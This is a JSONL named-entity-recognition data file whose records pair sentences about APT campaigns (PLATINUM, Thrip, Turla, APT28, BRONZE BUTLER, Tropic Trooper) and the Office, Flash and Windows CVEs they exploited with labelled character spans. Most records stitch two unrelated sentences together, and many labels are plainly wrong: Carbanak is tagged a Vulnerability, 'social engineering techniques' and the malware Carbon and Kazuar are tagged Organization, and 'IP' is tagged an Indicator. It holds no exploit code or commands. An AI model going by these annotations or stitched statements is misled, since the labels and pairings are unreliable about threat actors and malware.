document files exploit at least three known vulnerabilities in Microsoft Office , which we discuss in the Infection Techniques section . 
If the address falls within ranges that the attackers are interested in , the malicious site waits for their next page view to drop an exploit on the desirable target 's PC .", "spans": [{"start": 4, "end": 18, "label": "Malware"}, {"start": 48, "end": 63, "label": "Vulnerability"}, {"start": 276, "end": 283, "label": "Vulnerability"}]} {"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . Visitors to sites exploited by Emissary Panda are directed by code embedded in the sites to a malicious webpage , which screens their IP address .", "spans": [{"start": 90, "end": 123, "label": "Malware"}, {"start": 143, "end": 156, "label": "Vulnerability"}, {"start": 335, "end": 337, "label": "Indicator"}]} {"text": "According to the security firm , this campaign targeted Indian military officials via spear-phishing emails , distributing spyware to its victims via an Adobe Reader vulnerability . There has also been at least one victim targeted by a spear-phishing attack .", "spans": [{"start": 17, "end": 30, "label": "Organization"}, {"start": 153, "end": 179, "label": "Vulnerability"}]} {"text": "PLATINUM 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . A variety of malware , including the PlugX tool , was shared with other known Chinese threat groups .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 143, "end": 160, "label": "Vulnerability"}, {"start": 239, "end": 249, "label": "Malware"}]} {"text": "The group 's persistent use of spear phishing tactics ( phishing attempts aimed at specific individuals ) and access to previously undiscovered zero-day exploits have made it a highly resilient threat . 
Once inside networks , the group generally targeted Windows network domain controllers and Exchange e-mail servers , targeting user credentials to allow them to move to other systems throughout the targeted network .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 144, "end": 161, "label": "Vulnerability"}, {"start": 255, "end": 262, "label": "System"}]} {"text": "We believe that the Carbanak campaign is a clear indicator of a new era in cybercrime in which criminals use APT techniques directly against the financial industry instead of through its customers . They used an exploit of Internet Information Server to inject keylogger and backdoor malware onto the Exchange server .", "spans": [{"start": 20, "end": 28, "label": "Vulnerability"}, {"start": 95, "end": 104, "label": "Organization"}, {"start": 145, "end": 163, "label": "Organization"}, {"start": 212, "end": 219, "label": "Vulnerability"}, {"start": 261, "end": 270, "label": "Malware"}, {"start": 275, "end": 283, "label": "Malware"}, {"start": 284, "end": 291, "label": "Malware"}]} {"text": "Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp . 
But two tools used were unique to the group : ASPXTool , an Internet Information Services ( IIS ) specific \" Web shell \" used to gain access to servers inside a target 's network ; and the OwaAuth credential stealing tool and Web shell , used to attack Microsoft Exchange servers running the Web Outlook interface .", "spans": [{"start": 0, "end": 8, "label": "Vulnerability"}, {"start": 176, "end": 183, "label": "System"}, {"start": 232, "end": 240, "label": "Malware"}, {"start": 246, "end": 275, "label": "System"}, {"start": 278, "end": 281, "label": "System"}, {"start": 295, "end": 304, "label": "System"}, {"start": 375, "end": 382, "label": "Organization"}, {"start": 412, "end": 421, "label": "System"}, {"start": 439, "end": 448, "label": "Organization"}, {"start": 482, "end": 489, "label": "System"}]} {"text": "However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers . By using such features and tools , attackers are hoping to blend in on the victim 's network and hide their activity in a sea of legitimate processes .", "spans": [{"start": 50, "end": 54, "label": "Organization"}, {"start": 88, "end": 96, "label": "Vulnerability"}]} {"text": "PIVY also played a key role in the 2011 campaign known as Nitro that targeted chemical makers , government agencies , defense contractors , and human rights groups.10,11 Still active a year later , the Nitro attackers used a zero-day vulnerability in Java to deploy PIVY in 2012 . 
TAA leverages advanced artificial intelligence and machine learning that combs through Symantec 's data lake of telemetry in order to spot patterns associated with targeted attacks .", "spans": [{"start": 0, "end": 4, "label": "System"}, {"start": 96, "end": 115, "label": "Organization"}, {"start": 118, "end": 137, "label": "Organization"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 225, "end": 247, "label": "Vulnerability"}, {"start": 266, "end": 270, "label": "System"}, {"start": 281, "end": 284, "label": "Organization"}, {"start": 368, "end": 376, "label": "Organization"}]} {"text": "Each of the spear phishing attacks contained links to .doc files , which were really RTF documents that attempt to exploit CVE-2017-8570 ( Composite Moniker ) . January 2018 , TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": [{"start": 54, "end": 64, "label": "System"}, {"start": 85, "end": 98, "label": "Malware"}, {"start": 123, "end": 136, "label": "Vulnerability"}, {"start": 139, "end": 148, "label": "Vulnerability"}, {"start": 149, "end": 156, "label": "Vulnerability"}, {"start": 176, "end": 179, "label": "Organization"}, {"start": 210, "end": 227, "label": "Organization"}]} {"text": "The Word document usually exploits CVE-2012-0158 . Thrip was using PsExec to move laterally between computers on the company 's network .", "spans": [{"start": 4, "end": 17, "label": "Malware"}, {"start": 35, "end": 48, "label": "Vulnerability"}, {"start": 67, "end": 73, "label": "Malware"}]} {"text": "Sometimes the attackers send an MS PowerPoint document instead , which exploits CVE-2014-6352 . 
TAA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 32, "end": 54, "label": "Malware"}, {"start": 80, "end": 93, "label": "Vulnerability"}, {"start": 96, "end": 99, "label": "Organization"}, {"start": 130, "end": 147, "label": "Organization"}]} {"text": "Sometimes Patchwork send an MS PowerPoint document instead , which exploits CVE-2014-6352 . AA triggered an alert at a large telecoms operator in Southeast Asia .", "spans": [{"start": 10, "end": 19, "label": "Organization"}, {"start": 28, "end": 50, "label": "Malware"}, {"start": 76, "end": 89, "label": "Vulnerability"}, {"start": 125, "end": 142, "label": "Organization"}]} {"text": "The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . PsExec is a Microsoft Sysinternals tool for executing processes on other systems and is one of the most frequently seen legitimate pieces of software used by attackers attempting to live off the land .", "spans": [{"start": 29, "end": 36, "label": "Organization"}, {"start": 109, "end": 118, "label": "Malware"}, {"start": 133, "end": 146, "label": "Vulnerability"}, {"start": 151, "end": 164, "label": "Vulnerability"}, {"start": 183, "end": 189, "label": "Malware"}, {"start": 195, "end": 204, "label": "Organization"}]} {"text": "Older documents used by Patchwork focused on the CVE-2017-0261 vulnerability , however in late January 2018 when , paradoxically , newer documents abandoned this vulnerability to attack the older CVE-2015-2545 vulnerability . 
TAA not only flagged this malicious use of PsExec , it also told us what the attackers were using it for .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 196, "end": 209, "label": "Vulnerability"}, {"start": 226, "end": 229, "label": "Organization"}, {"start": 269, "end": 275, "label": "Malware"}]} {"text": "PittyTiger has also been seen using Heartbleed vulnerability in order to directly get valid credentials . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 36, "end": 60, "label": "Vulnerability"}, {"start": 187, "end": 208, "label": "Malware"}]} {"text": "They have also been seen using Heartbleed vulnerability in order to directly get valid credentials . three computers in China being used to launch the Thrip attacks .", "spans": [{"start": 31, "end": 55, "label": "Vulnerability"}]} {"text": "One of the favorite methods used by the Pitty Tiger group to infect users is to use a Microsoft Office Word document which exploits a specific vulnerability ( CVE-2012-0158 ) . Perhaps the most worrying discovery we made was that Thrip had targeted a satellite communications operator .", "spans": [{"start": 40, "end": 57, "label": "Organization"}, {"start": 86, "end": 116, "label": "Malware"}, {"start": 159, "end": 172, "label": "Vulnerability"}, {"start": 251, "end": 284, "label": "Organization"}]} {"text": "PittyTiger could also use CVE-2014-1761 , which is more recent . Thrip seemed to be mainly interested in the operational side of the company .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 26, "end": 39, "label": "Vulnerability"}]} {"text": "PLATINUM is known to have used a number of zero-day exploits , for which no security update is available at the time of transmission , in these attempts . 
This suggests to us that Thrip 's motives go beyond spying and may also include disruption .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 43, "end": 60, "label": "Vulnerability"}]} {"text": "The document , when opened , used an embedded ActiveX control to download a JavaScript file from a remote site that used a previously unknown vulnerability in some versions of Windows ( later designated CVE-2013-7331 ) to read information about the browser 's installed components . Armed with this information about the malware and living off the land tactics being used by this group of attackers whom we named Thrip , we broadened our search to see if we could find similar patterns that indicated Thrip had been targeting other organizations .", "spans": [{"start": 46, "end": 61, "label": "System"}, {"start": 76, "end": 91, "label": "Malware"}, {"start": 203, "end": 216, "label": "Vulnerability"}]} {"text": "When the document was opened in Word , PLATINUM exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . The group had also targeted three different telecoms operators , all based in Southeast Asia .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 39, "end": 47, "label": "Organization"}, {"start": 153, "end": 166, "label": "Vulnerability"}, {"start": 200, "end": 208, "label": "Organization"}, {"start": 326, "end": 344, "label": "Organization"}]} {"text": "The DLL exploited another previously unknown vulnerability ( designated CVE-2015-2546 ) in the Windows kernel , which enabled it to elevate privileges for the Word executable and subsequently install a backdoor through the application . 
In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": [{"start": 4, "end": 7, "label": "System"}, {"start": 72, "end": 85, "label": "Vulnerability"}, {"start": 159, "end": 163, "label": "System"}, {"start": 330, "end": 348, "label": "Organization"}, {"start": 374, "end": 383, "label": "Organization"}]} {"text": "When the document was opened in Word , it exploited a previously unknown vulnerability in the Microsoft Office PostScript interpreter ( designated CVE-2015-2545 ) that enabled it to execute the attacker 's code and drop an attacker-generated malicious DLL onto the computer . Catchamas is a custom Trojan designed to steal information from an infected computer and contains additional features designed to avoid detection .", "spans": [{"start": 32, "end": 36, "label": "System"}, {"start": 147, "end": 160, "label": "Vulnerability"}, {"start": 194, "end": 202, "label": "Organization"}, {"start": 276, "end": 285, "label": "Indicator"}, {"start": 298, "end": 304, "label": "Malware"}]} {"text": "In total , PLATINUM made use of four zero-day exploits during these two attack campaigns ( two remote code execution bugs , one privilege escalation , and one information disclosure ) , showing an ability to spend a non-trivial amount of resources to either acquire professionally written zero-day exploits from unknown markets , or research and utilize the zero-day exploits themselves . Many of the tools they use now feature new behaviors , including a change in the ACT they maintain a foothold in the targeted network .", "spans": [{"start": 11, "end": 19, "label": "Organization"}, {"start": 37, "end": 54, "label": "Vulnerability"}, {"start": 289, "end": 306, "label": "Vulnerability"}, {"start": 358, "end": 375, "label": "Vulnerability"}]} {"text": "PLATINUM has used several zero-day exploits against their victims . 
Execute a command through exploits for CVE-2017-11882 .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 26, "end": 43, "label": "Vulnerability"}, {"start": 107, "end": 121, "label": "Vulnerability"}]} {"text": "Even if CVE-2015-2546 affected Windows 10 , the exploitation would have required much more technical prowess to succeed ; ultimately , SMEP makes it more difficult for attackers . Execute a command through exploits for CVE-2018-0802 .", "spans": [{"start": 8, "end": 21, "label": "Vulnerability"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 219, "end": 232, "label": "Vulnerability"}]} {"text": "For example , one zero-day vulnerability exploit ( CVE-2015-2545 ) used by PLATINUM was addressed immediately in September 2015 . The backdoor will load the encrypted configuration file and decrypt it , then use Secure Sockets Layer ( SSL ) protocol to connect to command-and-control ( C&C ) servers .", "spans": [{"start": 18, "end": 40, "label": "Vulnerability"}, {"start": 51, "end": 64, "label": "Vulnerability"}, {"start": 75, "end": 83, "label": "Organization"}, {"start": 212, "end": 232, "label": "Indicator"}, {"start": 235, "end": 238, "label": "Indicator"}, {"start": 264, "end": 283, "label": "System"}, {"start": 286, "end": 289, "label": "System"}]} {"text": "It possesses a wide range of technical exploitation capabilities , significant resources for researching or purchasing complicated zero-day exploits , the ability to sustain persistence across victim networks for years , and the manpower to develop and maintain a large number of tools to use within unique victim networks . 
TClient is actually one of Tropic Trooper 's other backdoors .", "spans": [{"start": 29, "end": 64, "label": "System"}, {"start": 131, "end": 148, "label": "Vulnerability"}, {"start": 325, "end": 332, "label": "Malware"}]} {"text": "In 2016 , an attack campaign by this group was recorded in early May that made use of an exploit for CVE-2016-4117 , a vulnerability in Adobe Flash Player , which at the time was both unknown and unpatched . The malicious loader will use dynamic-link library ( DLL ) hijacking \u2014 injecting malicious code into a process of a file/application \u2014 on sidebar.exe and launch dllhost.exe ( a normal file ) .", "spans": [{"start": 37, "end": 42, "label": "Organization"}, {"start": 101, "end": 114, "label": "Vulnerability"}, {"start": 238, "end": 258, "label": "System"}, {"start": 261, "end": 264, "label": "System"}, {"start": 346, "end": 357, "label": "Indicator"}, {"start": 369, "end": 380, "label": "Indicator"}]} {"text": "To deliver the malware to the victim machines , the Rocke group exploits vulnerabilities in Apache Struts 2 , Oracle WebLogic , and Adobe ColdFusion . TClient , for instance , uses DLL hijacking and injection that may not be as noticeable to others .", "spans": [{"start": 52, "end": 88, "label": "Vulnerability"}, {"start": 151, "end": 158, "label": "Malware"}]} {"text": "However , around a month ago , Rocke started targeting systems that run Jenkins by attempting to exploit CVE-2018-1000861 and CVE-2019-1003000 . The backdoor noted by other security researchers was encoded with different algorithms and configured with different parameter names in 2016 , for instance .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 105, "end": 121, "label": "Vulnerability"}, {"start": 126, "end": 142, "label": "Vulnerability"}]} {"text": "The Shadow Brokers first emerged in August , when they posted links to a selection of NSA exploits and hacking tools onto Github and other websites . 
Taiwan has been a regular target of Cyber Espionage threat actors for a number of years .", "spans": [{"start": 86, "end": 98, "label": "Vulnerability"}]} {"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . In early August , Unit 42 identified two attacks using similar techniques .", "spans": [{"start": 22, "end": 39, "label": "Organization"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 132, "end": 147, "label": "Vulnerability"}, {"start": 180, "end": 187, "label": "Organization"}]} {"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . which has been active since at least 2011 .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 62, "end": 77, "label": "Vulnerability"}]} {"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . One of the attacks used Tropic Trooper 's known Yahoyah malware , but the other attack deployed the widely available Poison Ivy RAT .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 79, "end": 93, "label": "Vulnerability"}, {"start": 215, "end": 222, "label": "Malware"}, {"start": 223, "end": 230, "label": "Malware"}]} {"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . 
This confirms the actors are using Poison Ivy as part of their toolkit , something speculated in the original Trend Micro report but not confirmed by them .", "spans": [{"start": 71, "end": 90, "label": "System"}, {"start": 218, "end": 229, "label": "Vulnerability"}, {"start": 304, "end": 314, "label": "Malware"}, {"start": 379, "end": 390, "label": "Organization"}]} {"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . The document attached to this e-mail exploits CVE-2012-0158 .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}, {"start": 288, "end": 294, "label": "Vulnerability"}, {"start": 295, "end": 303, "label": "Vulnerability"}, {"start": 304, "end": 317, "label": "Vulnerability"}]} {"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": [{"start": 54, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 121, "label": "Organization"}, {"start": 190, "end": 201, "label": "Indicator"}]} {"text": "Figure 2: Zyklon attack flowInfection Techniques CVE-2017-8759 . Further analysis uncovered a handful of ties indicating the actors may also be using the PCShare malware family , which has not been previously tied to the group .", "spans": [{"start": 10, "end": 16, "label": "Organization"}, {"start": 49, "end": 62, "label": "Vulnerability"}, {"start": 154, "end": 176, "label": "Malware"}]} {"text": "This vulnerability was discovered by FireEye in September 2017 , and it is a vulnerability we have observed being exploited in the wild . 
This matches with known Tactics , Techniques , and Procedures ( TTPs ) for Tropic Trooper , targeting both government institutions and also the energy industry in Taiwan .", "spans": [{"start": 5, "end": 18, "label": "Vulnerability"}, {"start": 37, "end": 44, "label": "Organization"}, {"start": 213, "end": 227, "label": "Organization"}, {"start": 245, "end": 268, "label": "Organization"}, {"start": 282, "end": 297, "label": "Organization"}]} {"text": "Figure 3: Embedded URL in OLE object CVE-2017-11882 Similarly , we have also observed actors leveraging another recently discovered vulnerability (CVE-2017-11882) in Microsoft Office . Tropic Trooper is also still exploiting CVE-2012-0158 , as are many threat actors .", "spans": [{"start": 37, "end": 51, "label": "Vulnerability"}, {"start": 86, "end": 92, "label": "Organization"}, {"start": 146, "end": 162, "label": "Vulnerability"}, {"start": 185, "end": 199, "label": "Organization"}, {"start": 225, "end": 238, "label": "Vulnerability"}]} {"text": "The other overlapping files are tools used by the adversary to locate other systems on the network etool.exe , check to see if they are vulnerable to CVE-2017-0144 (EternalBlue) patched in MS07-010 checker1.exe and pivot to them using remote execution functionality offered by a tool similar to PsExec offered by Impacket psexec.exe . 
The Tropic Trooper threat actor group has been known to target governments and organizations in the Asia Pacific region for at least six years .", "spans": [{"start": 99, "end": 108, "label": "Malware"}, {"start": 150, "end": 163, "label": "Vulnerability"}, {"start": 189, "end": 197, "label": "Malware"}, {"start": 198, "end": 210, "label": "Malware"}, {"start": 295, "end": 301, "label": "Malware"}, {"start": 322, "end": 332, "label": "Malware"}, {"start": 339, "end": 372, "label": "Organization"}, {"start": 398, "end": 409, "label": "Organization"}]} {"text": "The files uploaded to this webshell included the same compiled python script that would scan remote systems that were vulnerable to CVE-2017-0144 (EternalBlue) that we saw uploaded to the other errr.aspx webshell . Turla is a notorious group that has been targeting governments .", "spans": [{"start": 63, "end": 76, "label": "System"}, {"start": 132, "end": 145, "label": "Vulnerability"}, {"start": 194, "end": 203, "label": "Malware"}, {"start": 215, "end": 220, "label": "Organization"}, {"start": 266, "end": 277, "label": "Organization"}]} {"text": "We believe the actors pivoted to other systems on the network using stolen credentials and by exploiting the CVE-2017-0144 (EternalBlue) vulnerability patched in MS17-010 . Turla is known to run watering hole and spearphishing campaigns to better pinpoint their targets .", "spans": [{"start": 15, "end": 21, "label": "Organization"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 162, "end": 170, "label": "Malware"}, {"start": 173, "end": 178, "label": "Organization"}]} {"text": "Code contained inside one of the slides triggers an exploit for CVE-2017-8759 , a remote code execution vulnerability in Microsoft .NET framework . 
Turla is a notorious group that has been targeting government officials .", "spans": [{"start": 33, "end": 39, "label": "Malware"}, {"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 121, "end": 145, "label": "System"}, {"start": 148, "end": 153, "label": "Organization"}, {"start": 199, "end": 219, "label": "Organization"}]} {"text": "According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . The documents attached to spear-phishing e-mails used in both attacks contain code that exploits CVE-2012-0158 , which despite its age remains one of the most common Microsoft Word vulnerabilities being exploited by multiple threat actors .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}, {"start": 201, "end": 210, "label": "Indicator"}, {"start": 294, "end": 307, "label": "Vulnerability"}, {"start": 363, "end": 377, "label": "System"}, {"start": 378, "end": 393, "label": "Vulnerability"}]} {"text": "According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL . Turla is a notorious group that has been targeting diplomats .", "spans": [{"start": 13, "end": 20, "label": "Organization"}, {"start": 27, "end": 36, "label": "Organization"}, {"start": 104, "end": 136, "label": "Vulnerability"}, {"start": 187, "end": 194, "label": "System"}, {"start": 197, "end": 202, "label": "Organization"}, {"start": 248, "end": 257, "label": "Organization"}]} {"text": "Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . 
The codename for Turla APT group in this presentation is MAKERSMARK .", "spans": [{"start": 31, "end": 36, "label": "Organization"}, {"start": 65, "end": 73, "label": "System"}, {"start": 82, "end": 96, "label": "System"}, {"start": 99, "end": 103, "label": "System"}, {"start": 129, "end": 142, "label": "Vulnerability"}, {"start": 162, "end": 177, "label": "Organization"}]} {"text": "The Sofacy group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . The Intercept reported that there exists a 2011 presentation by Canada 's Communication Security Establishment ( CSE ) outlining the errors made by the Turla operators during their operations even though the tools they use are quite advanced .", "spans": [{"start": 4, "end": 16, "label": "Organization"}, {"start": 60, "end": 74, "label": "Vulnerability"}, {"start": 92, "end": 99, "label": "System"}, {"start": 106, "end": 126, "label": "System"}, {"start": 223, "end": 269, "label": "Organization"}, {"start": 272, "end": 275, "label": "Organization"}, {"start": 311, "end": 316, "label": "Organization"}]} {"text": "APT28 spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . 
The witnessed techniques , tactics and procedures ( TTPs ) are in-line with what we usuallysee in Turla 's operation : a first stage backdoor , such as Skipper , likely delivered through spearphishing followed by the appearance on the compromised system of a second stage backdoor , Gazerin this case .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 49, "end": 63, "label": "Vulnerability"}, {"start": 81, "end": 88, "label": "System"}, {"start": 95, "end": 115, "label": "System"}, {"start": 246, "end": 264, "label": "Organization"}, {"start": 300, "end": 307, "label": "Malware"}]} {"text": "The group spearphished targets in several waves with Flash exploits leading to their Carberp based JHUHUGIT downloaders and further stages of malware . Southeastern Europe as well as countries in the former Soviet Union Republichas recently been the main target .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 53, "end": 67, "label": "Vulnerability"}, {"start": 85, "end": 92, "label": "System"}, {"start": 99, "end": 119, "label": "System"}]} {"text": "APT28 is using novel techniques involving the EternalBlue exploit and the open source tool Responder to spread laterally through networks and likely target travelers . 
Finally , there are many similarities between Gazer and other second stage backdoors used by the Turla group such as Carbon and Kazuar .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 46, "end": 65, "label": "Vulnerability"}, {"start": 74, "end": 90, "label": "System"}, {"start": 91, "end": 100, "label": "System"}, {"start": 214, "end": 219, "label": "Malware"}, {"start": 243, "end": 252, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 285, "end": 291, "label": "Organization"}, {"start": 296, "end": 302, "label": "Organization"}]} {"text": "The JHUHUGIT implant became a relatively popular first stage for the Sofacy attacks and was used again with a Java zero-day ( CVE-2015-2590 ) in July 2015 . Skipper , which has been linked to Turla in the past , was found alongside Gazer in most cases we investigated .", "spans": [{"start": 4, "end": 12, "label": "System"}, {"start": 110, "end": 123, "label": "Vulnerability"}, {"start": 126, "end": 139, "label": "Vulnerability"}, {"start": 157, "end": 164, "label": "Malware"}, {"start": 192, "end": 197, "label": "Organization"}, {"start": 232, "end": 237, "label": "Malware"}]} {"text": "We are however only aware of one instance - the exploitation of CVE-2013-0640 to deploy MiniDuke - where we believe the exploited vulnerability was a zero-day at the time that the group acquired the exploit . 
Turla APT group makes an extra effort to avoid detection by wiping files securely , changing the strings and randomizing what could be simple markers through the different backdoor versions .", "spans": [{"start": 64, "end": 77, "label": "Vulnerability"}, {"start": 88, "end": 96, "label": "System"}, {"start": 150, "end": 158, "label": "Vulnerability"}, {"start": 180, "end": 185, "label": "Organization"}, {"start": 209, "end": 224, "label": "Organization"}]} {"text": "FireEye confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including government institutions .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 54, "end": 59, "label": "Organization"}, {"start": 72, "end": 106, "label": "Vulnerability"}, {"start": 109, "end": 122, "label": "Vulnerability"}, {"start": 139, "end": 154, "label": "System"}, {"start": 202, "end": 212, "label": "Malware"}, {"start": 291, "end": 314, "label": "Organization"}]} {"text": "FireEye iSIGHT Intelligence confirmed that since at least November 2017 , APT37 exploited a zero-day Adobe Flash vulnerability , CVE-2018-4878 , to distribute DOGCALL malware to South Korean victims . 
Turla all uses an encrypted container to store the malware 's components and configuration and they also log their actions in a file .", "spans": [{"start": 0, "end": 27, "label": "Organization"}, {"start": 74, "end": 79, "label": "Organization"}, {"start": 92, "end": 126, "label": "Vulnerability"}, {"start": 129, "end": 142, "label": "Vulnerability"}, {"start": 159, "end": 174, "label": "System"}, {"start": 201, "end": 206, "label": "Organization"}, {"start": 219, "end": 238, "label": "Malware"}]} {"text": "A well-funded , highly active group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . Over the last 10 months , Kaspersky Lab researchers have analyzed a massive cyber-espionage operation which we call \" Epic Turla \" .", "spans": [{"start": 30, "end": 35, "label": "Organization"}, {"start": 54, "end": 61, "label": "Organization"}, {"start": 105, "end": 121, "label": "Vulnerability"}, {"start": 247, "end": 258, "label": "Organization"}, {"start": 287, "end": 300, "label": "Organization"}, {"start": 379, "end": 389, "label": "Malware"}]} {"text": "A well-funded , highly active BlackOasis group of Middle Eastern hackers was caught , yet again , using a lucrative zero-day exploit in the wild to break into computers and infect them with powerful spyware developed by an infamous cyberweapons dealer named Gamma Group . 
We also observed exploits against older ( patched ) vulnerabilities , social engineering techniques and watering hole strategies in these attacks .", "spans": [{"start": 30, "end": 46, "label": "Organization"}, {"start": 65, "end": 72, "label": "Organization"}, {"start": 116, "end": 132, "label": "Vulnerability"}, {"start": 258, "end": 269, "label": "Organization"}, {"start": 342, "end": 360, "label": "Organization"}]} {"text": "Kaspersky found the BlackOasis group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including embassies .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 20, "end": 36, "label": "Organization"}, {"start": 54, "end": 95, "label": "Vulnerability"}, {"start": 98, "end": 111, "label": "Vulnerability"}, {"start": 158, "end": 164, "label": "System"}, {"start": 246, "end": 256, "label": "Malware"}, {"start": 335, "end": 344, "label": "Organization"}]} {"text": "Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . 
The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including military .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 20, "end": 25, "label": "Organization"}, {"start": 43, "end": 84, "label": "Vulnerability"}, {"start": 87, "end": 100, "label": "Vulnerability"}, {"start": 147, "end": 153, "label": "System"}, {"start": 235, "end": 245, "label": "Malware"}, {"start": 324, "end": 332, "label": "Organization"}]} {"text": "BRONZE BUTLER has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including education .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 69, "end": 91, "label": "Vulnerability"}, {"start": 272, "end": 282, "label": "Malware"}, {"start": 361, "end": 370, "label": "Organization"}]} {"text": "The group has demonstrated the ability to identify a significant zero-day vulnerability within a popular Japanese corporate tool and then use scan-and-exploit techniques to indiscriminately compromise Japanese Internet-facing enterprise systems . When G-Data published on Turla/Uroburos back in February , several questions remained unanswered .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 65, "end": 87, "label": "Vulnerability"}, {"start": 252, "end": 258, "label": "Organization"}, {"start": 272, "end": 286, "label": "Organization"}]} {"text": "BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . 
The attackers behind Epic Turla have infected several hundred computers in more than 45 countries , including research and pharmaceutical companies .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 96, "end": 110, "label": "System"}, {"start": 136, "end": 150, "label": "Vulnerability"}, {"start": 190, "end": 200, "label": "Malware"}, {"start": 292, "end": 316, "label": "Organization"}]} {"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . The primary backdoor used in the Epic attacks is also known as \" WorldCupSec \" , \" TadjMakhal \" , \" Wipbot \" or \" Tavdig \" .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 92, "end": 106, "label": "System"}, {"start": 132, "end": 146, "label": "Vulnerability"}, {"start": 230, "end": 241, "label": "Organization"}, {"start": 248, "end": 258, "label": "Organization"}, {"start": 265, "end": 271, "label": "Organization"}, {"start": 279, "end": 285, "label": "Organization"}]} {"text": "While investigating a 2016 intrusion , Secureworks identified BRONZE BUTLER exploiting a then-unpatched remote code execution vulnerability ( CVE-2016-7836 ) in SKYSEA Client View , a popular 